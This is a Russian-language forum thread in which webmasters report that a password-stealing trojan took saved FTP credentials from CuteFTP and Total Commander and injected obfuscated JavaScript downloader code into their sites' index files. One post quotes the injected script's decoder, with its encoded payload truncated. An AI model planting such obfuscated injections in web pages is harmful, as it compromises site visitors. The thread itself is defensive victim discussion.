Вирус!! Заразились все сайты

Если установлен master password маловероятно, хотя и возможно. В этом случае с диска пароли не вытащить (так как они там зашифрованы этим самым MP, как ключом), а вот из памяти FF можно.

А вообще нечего пинчей ловить, как вы умудряетесь? Запускаете все подряд скаченное из сети? Хотя, если использовать пиратский софт, то с кряками чего только не натащешь :(

Вчера заметил у себя эту тварь.

Заразила все php-файлы.

Кстати, тут люди говорили о том, что он берет пароли с TotalCMD.

У меня его, например, нет.

Паролей к ФТП больше ни у кого нет.

А пользуюсь я CuteFTP.

И из CuteFTP пароли берет... и из аськи и еще много из чего... вот тут любопытная сводка http://www.viruslist.com/ru/viruses/encyclopedia?virusid=147349

Осторожно новая хрень. Товарищи каталогодержатели проверте свои каталоги на наличие в них троянов.

После прогона обнаружил нелады с IE. браузер глюкавить стал. опреа и мозила не фурычат. Поставил последние базы от 20 мая касперского проверил нашел несколоко троянов.

Далее на своих сайтах касперский стал активно хрюкать. Оказалось в конец файлов в корне домена и а на одну дирректорию ниже index.* и main.* дописан вредоносный код на JS: Trojan-Downloader.JS.Agent.ga (в базах касперского кажется с 17мая)

код вставлен преред закрывающим тегом </body>:

<!-- o65 --><script language='JavaScript'><!--

function nbsp() {var t,o,l,i,j;var s='';s+='06004711610112011609.... 

.....

01114061039048039062060047105102114097109101062';

t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();

//--></script><!-- o65 --></body>

Если на фреймах страница, то после </html>

Если все закодирован zend гвардом, то

print "код вредоносный";

Все было спрето из cute-ftp для сайтов, к которым сохранил пароли там.

Сайты, котрые там не значились не пострадали.

zufer, У знакомого на сайте неделю назад такое же было.

Удивило то что после кода скрипта в коменте был номер договора хостинга

У вас там тоже вижу комент <!-- o65 -->

А еще более интересное то что знакомый хранил все пароли в текстовом файле и в письмах электронных, cute-ftp у него нет и никогда не было. Он вообще не занимается сайтом.

Я ему помогал и все заливал. У меня в cute-ftp его пароли храняться, но у меня там еще 40 сайтов и они не пострадали да и касперский у меня обновляется каждый час и каждую ночь полная проверка системы (и так далее)

Было такое же. Пароли стащили по локалке. Стоят на компьютерах NODы, но на одном постоянно вылетает. На том компьютере не было ftp на total commander, но были на других. После вылета всех моих сайтов с непонятными записями, провели глубокий анализ нодом, и убили троянов. Поменяли все пароли к фтп. Проблемы исчезли.

PS: На одном сайте не удалось поменять пароль, так изменения шли постоянно, пока не поставил права на файл 444. ☝

у меня такое было, тожа антивирусник ничего не нашол. пришлось менять пароли на все фтп сайтов и в тотал командер записывать не полностью пароль, а все символы кроме последнего. последний символ для всех фтп лежит у меня перед глазами в рукописном варианте. больше проблема не повторялась. К неудобствам привык. а вот для интереса на одном фтп не поменял пароль. так каждый день заливаю новый индесовый файл, а на след день снова там эта фигня:-(

NOD32 не лучшее решение для поиска вирусов. ;)